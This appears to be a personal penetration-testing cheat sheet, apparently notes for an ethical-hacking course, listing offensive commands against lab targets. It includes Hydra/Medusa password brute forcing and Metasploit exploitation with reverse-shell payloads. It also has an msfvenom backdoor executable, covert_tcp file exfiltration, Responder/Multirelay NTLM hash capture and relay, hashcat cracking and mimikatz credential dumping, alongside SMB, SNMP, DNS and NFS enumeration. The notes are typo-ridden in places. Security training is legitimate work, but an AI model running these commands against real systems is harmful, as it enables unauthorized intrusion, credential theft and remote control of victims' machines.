spicy_pentest_checklist
xam2
20 November 2022 19:48
Hydra tOOL:
Hydra -P <.txt> -L <.txt> ftp://<ip>
Medusa
Medusa -h <ip> -U <.txt> -P <.txt> -M <Service (ftp,ssh)>
Vulnerability Assessments
Nikto -h <ip> Tuning x
System hacking Metasploit
Do nmpa service detection
Search <service name> # for samba search usermap_script
Use <payload name>
Show options
Set RHOST IP and LHOSt IP
Set Payload <path>
Exploit
Note: payload : cmd/unix/reverse
For unrealIRC port 6667 use <search unrealirc>
Backdooring through Metasploit
Msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST <ip> LPORT<N .o> -o /path.exe
Listning:
Msfconsole -q
Use exploit /multi/handler
Ayload windows/meterpreter/reverse_tcp Set LHOST <ip>
Set LPORT <ip> Exploit
Adding Powersploit for VNC connection and Evasion Bypass!
Hacking Windows machine with a Microsoft office Document using FAT RAT:
Gaining highest ROOT Privilege using Beroot
Once you got reverse shell with meterpreter upload beetroot Then by using shell execute beetroot
Covert Channels using covert_TCP
We have to compile the covert_tcp file
Cc -o <output of compiled file.c> <file name>
./covert_tcp.c -dest<ip> -source <ip> -source_port<n.o> -dest_port
<> -server -file <the path you want to save your file>
./covert_tcp.c -dest<ip> -source <ip> -source_port<n.o> -dest_port
<> -file <the path of the file which wanted to be sent >
<>
Steganography:
Snow -C -m "<message>" -p "<password>" <existing txt> <new txt> Snow -C -p "<password>" <new txt>
HOST Discovery
Linux Tools:
Netdiscover
$netdiscover -i <Interface name>
$netdicover -i <subnet> NMAP
$nmap -sn -PR [IP]
-sn: Disable port scan PR:*ARP ping scan
$nmap -sn -PU [IP]
-PU: UDP ping scan
$nmap -sn -PE [IP or IP Range] PE: ICMP ECHO ping scan
$nmap -sn -PP [IP
PP: ICMP timestamp ping scan
$nmap -sn -PM [IP]
PM: ICMP address mask ping scan
$nmap -sn -PS [IP]
PS: TCP SYN Ping scan
Scanning:
NMAP
$Nmap -sn <ip> -vv -oA <outputname.xml>
Ref: https://www.stationx.net/nmap-cheat-sheet/ https://www.stationx.net/nmap-cheat-sheet/
To Convert nmap.xml to html use-
$xsltproc ms2.xml -o ms2.html
PORT 21 Enumeration:
First of all we need to know the version and type -- vsftpd 2.3.4
second - ftp has an common issue - anonymous login username - anonymous
password - anonymous
third - we can do script scan --
choose the relvent nmap script for the enumration
Now if version is not showing any details from basic enumration then try visit - exploit-db.com
and try to search the exploit
if you want localsearch then try with
always skip the DOS scripts
if you dont have access to the machine locally then always choose the remote scripts for the maximum results if they are visible
DOS - ignore
webapps -- check further Remote - for direct usage
local - if you have cetain access of the target then choose the local exploits
PORT 22 Enumeration:
guessing the username and password -->>
brute force username and password ( get the username somehow )
openssl < 1.0 then it has a private key brute force attack option ( legacy attack )
PORT 23 Enumeration:
if any version is discloused here the follow the same steps like ftp exploit search
SMB Enumeration:
versions of smb >??? v1 , v2 ,v3
port 137 , 138 , 139 , 445
anonymous login or guest login
if you have password then mount the share
version speicifc issues
smbv1 - eternalblue smbv2 - llmnr poisoning smbv3 - smbghost
distc kernelmapper Portmapper enum4linux
smbclient smbmap
--script discovery
Sambacry
SMB Enum using NMAP scripts
$Nmap -p 445 --script /usr/share/nmap/scripts/smb-enum-sessions.nse <IP>
$Nmap -p 445 --script /usr/share/nmap/scripts/smb-enum-shares.nse <IP>
$Nmap -p 445 --script /usr/share/nmap/scripts/smb-os-discovery.nse <IP>
$nmap -Pn -n -p139,445 --script discovery 192.168.72.139
You can also specify -p 445 , 139 for ports.
$nmap -p 139 --script smb-double-pulsar-backdoor <IP>
SMB Enum using smbclient and smbmap
$smbclient -L \\192.168.72.139\\
$smbmap -H 192.168.72.139
$smbclient \\\\192.168.72.139\\tmp
SMB ENUM using SMBmap
$smbmap -R tmp -H <ip>
$you can use -U -P -R -r please do check the manual page
SMB ENUM using SMB Client:
$smbclient -L <ip with the path>
Enum4Linux: mostly used for SAMBA ENUM!
*enumerate info from windows and samba hosts using enum4linux
enum4linux -u martin -p apple -n $ip
-n Do an nmblookup (similar to nbtstat)
//information: target info,workgroup/domain,domain SID(SECURITY IDENTIFIER), list of users with RID(RELATive identifier)
enum4linux -u martin -p apple -P $ip
//password policy info
enum4linux -u martin -p apple -S $ip
//share policy info
Good R
Esource consist of everythig discussed so far: https://github.com/irgoncalves/smbclient_cheatsheet
Windows tools:
NETSCAN tools pro --> use smb scanner option
NETBIOS Enumeration:
Tool: https://nbtenum.sourceforge.net/
Nbtstat -a <ip> for windows use only Nbtstat -c <ip> for windows use only Nbtscan <ip-range> for Parrot use only
Microsoft Documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows- commands/nbtstat
You can aslo nmap here
Nmap -sV -v --script nbstat.nse<ip> nmap -sU -p 137 --script nbstat.nse<ip> nmap -sV -v --script nbstat.nse $ip
-sV: Probe open ports to determine service/version info
*NB enum using cmd nbtstat -a $ip
a nb name of remote comp
nbtstat -c $ip
c nb name cache of remote comp
net use
connection status, shared folder, network info
connect or disconnects a computer from shared resource
*nb enum using netbios enumerator
NETBIOS ENUMERATION SUPERSCAN
NETBIOS ENUMERATOR NULL SESSION NETBIOS
NET USE \\IP\FOLDER ""\USER:""
SNMP Enumeration:
Snmp-check <ip> Nmap -sU -p 161 <ip>
**perform smnp enum using snmp-check check if snmp is open
nmap -sU -p 161 $ip
-depicts : 161 is being used by the default public ocmmunity string
snmp-check $ip
//get info about sys info and user accounts,network info , network interfaces,routing info,and listening ports
//process, storage ,file system ,device info,shares ,file system
**perform smnp enum using soft perfect network scanning specify range ,discover devices,rightclick properties and get details
SNMP 161 BRUTE FORCE
NMAP -sU -p 161 --script=snmp-brute IP
METASPLOIT ( AUXILIARY/SCANNER/SNMP/SNMP_LOGIN) ( AUXILIARY/SCANNER/SNMP/SNMP_ENUM)
**Lab2-Task1: Enumerate SNMP using snmp-check**
nmap -sU -p 161 [IP]
**snmp-check [IP]**
**Addition**
nbtstat -a [IP] (Windows)
nbtstat -c
DNS Enumeration:
To get name server and mail server details:
$dnsenum <ip>
To get different services running on target domain
$Dnsrecon -t -srv -d <ip> / -t oxfr(this is for zone transfer) To get name servers of target domains
$fierce -dns <ip>
*perform dns enum
//collect dns server name,hostnames,machine names,usernames,ip addrr and aliases in target domain
**perform dns enum using zone transfer open termninal in linux
dig ns www.certifiedhacker.com
reterive info about dns name server pf target domain and displays in answer section
try if zone transfer is possible
dig @ns1.bluehost.com www.certifiedhacker.com axfr axfr reterive zone information
**perform dns enum of windows DNS servers. open cmd in windows
>nslookup
>set qyerytype=soa
soa start of authority record, administrative info about dns zone
>certifiedhacker.com
>ls -d ns1.bluehost.com
ls -d requests zone transfer ns1.bluehost.com primary name server
**perform dns enum usign DNSSEC zone walking
//dns records(MX,SOA,NS,A,AAAA,SPF,TXT) enumerator
dnsrecon -d www.certifiedhacker.com -z
-d domain
-z zone walk using standard enum procedure
LDAP ENUM:
perform LDAP enumeration
..generate list of distributed directory services on target system
..directory services has hierarchical and logical tree about components of network, from list of printers to corporate email directories
.. company org chart
**perform LDAP enumeration using Active Directory Explorer by sysinternals connect using IP and creds
complete AD would be displayed and possible to modify also
Windows tool
;Active Diretory Explorer.
RPC ENUM:
*perform rpc, smb, and ftp enumeration
rpc-> check vulnerable services on these ports
smb-> enable banner grabbing, os detais,service version
ftp-> check ftp services and attack, ftp bounce, ftp brutre and packet sniffing
*perform rpc & smb enumeration using netscan tools pro RPC- netscan tools pro
>MANUAL TOOLS
>nix RPC info
>target ip, target port 111
>dump portmap
>result: reterival of all running registred daemons on target system
SMB- - netscan tools pro
>smb scanner
>add to list ->ok
>login cred, username, password > add to list > ok
>click get smb versions
>result: netbios name,dns name,smb versions,shares
*perform rpc & smb & ftp enumeration using nmap nmap -p 21 $ip
nmap -A $ip
nmap -A -p 445 $ip
NFS ENUM:
*perform NFS Enumeration
NFS - access / view /store /update files on reomote server
After LDAP go for NFS - IDENTIFY EXPORTED DIRECTORIES,list of clients connected to server with their ip addr and shared data associated with them
Possible to spoof ip and get acces to shared resource
**perform NFS Enumeration superenum check if nfs is open
nmap -p 2049 $ip
nfs also runs on other ports echo $ip > target.txt
./superenum
//pass filename -> target.txt 15-20 minutes to complete
**perform NFS Enumeration rpc-scan
git clone https://github.com/hegusung/RPCScan
python3 rpc-scan $ip --rpc
it will show the list if nfs is open
System hacking:
Gem References: https://github.com/SpiderLabs/Responder
https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b
RESPONDER
responder -I tun0 // john responder_file
Download Responder tool
--> git clone https://github.com/lgandx/Responder
Launch Responder
--> python Responder.py -I eth0
--> Check LLMNR / NBT-NS / DNS/MDNS are ON
Search shared file on victim host
--> \\hackme
Attacker host (Responder)
--> Received NTLMv2 Hash of the victim
Crack Hash value to get the password using Hashcat
--> hashcat -m 5600 hashes.txt rockyou.txt -D1
--> hashcat -m 5600 hashes.txt rockyou.txt -D1 --show --user
SMB Relay
--> python Multirelay.py -h
--> python Multirelay.py -t <Target-IP> -u ALL
--> Before running Multirelay script, need to turn OFF (SMB and HTTP) options
--> vim Responder.conf
--> Received hash value of the victim
--> Forward to the targeted file, to get access as the victim
Show password in victim host
--> help
--> mimi coffee
--> mimi sekurlsa::logonpasswords
RunFinger
--> Only work when SMB is disabled.
--> python RunFinger.py -h
--> python RunFinger.py -i 192.168.1.0/24 Reference
--> https://notsosecure.com/pwning-with-responder-a-pentesters-guide/
--> https://www.youtube.com/watch?v=rjRDsXp_MNk&ab_channel=RajganeshPandurangan
--> https://www.youtube.com/watch?v=LHv1ud5lnX0&ab_channel=Joostvan%27tZand
Last updated